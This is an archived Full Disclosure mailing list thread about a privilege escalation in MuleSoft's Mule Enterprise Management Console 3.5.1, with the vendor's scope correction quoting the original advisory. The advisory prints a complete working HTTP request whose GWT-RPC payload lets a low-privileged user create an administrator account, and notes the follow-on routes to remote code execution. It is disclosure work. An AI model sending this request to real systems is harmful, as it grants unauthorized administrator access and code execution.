Full Disclosure mailing list archives
Re: Mulesoft ESB Authenticated Privilege Escalation
From: Barak Engel <barak () mulesoft com>
Date: Thu, 23 Oct 2014 17:36:09 -0700
Thank you Brandon Perry for finding this vulnerability.We would like to make a correction to the disclosure - this issue affects only the Mule Enterprise Management Console (MMC) used by some customer administrators to manage Mule ESB runtimes, and not the Mule ESB runtime itself. MMC is typically deployed in a secure network segment, accessible only to trusted users. Therefore, under normal conditions, this exploit would originate from an internal trusted user.
MuleSoft has identified the source code in the MMC product that produces this vulnerability, and is developing a patch to fix the issue.
For further information please visit: http://www.mulesoft.org/documentation/display/current/Mule+Enterprise+Management+Console+Security+Update
==ORIGINAL TEXT FOLLOWS==Mulesoft ESB Authenticated Privilege Escalation From: Brandon Perry <bperry.volatile () gmail com>
Date: Tue, 21 Oct 2014 12:06:55 -0500 Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even those with a single role of Monitor. POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 Host: 192.168.0.22:8585 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/x-gwt-rpc; charset=utf-8/ Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp Content-Length: 503 Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4; Connection: keep-alive Pragma: no-cache Cache-Control: no-cache 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/ |5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611| fdsafdsa () fdsafdsa com |java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15| This request will create an administrator with all roles with a username of notadmin and a password of notpassword. Many vectors of remote code execution are available to an administrator. Not only can an administrator deploy WAR applications, they can also evaluate arbitrary groovy scripts via the web interface. -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Mulesoft ESB Authenticated Privilege Escalation Brandon Perry (Oct 22)
- <Possible follow-ups>
- Re: Mulesoft ESB Authenticated Privilege Escalation Barak Engel (Oct 24)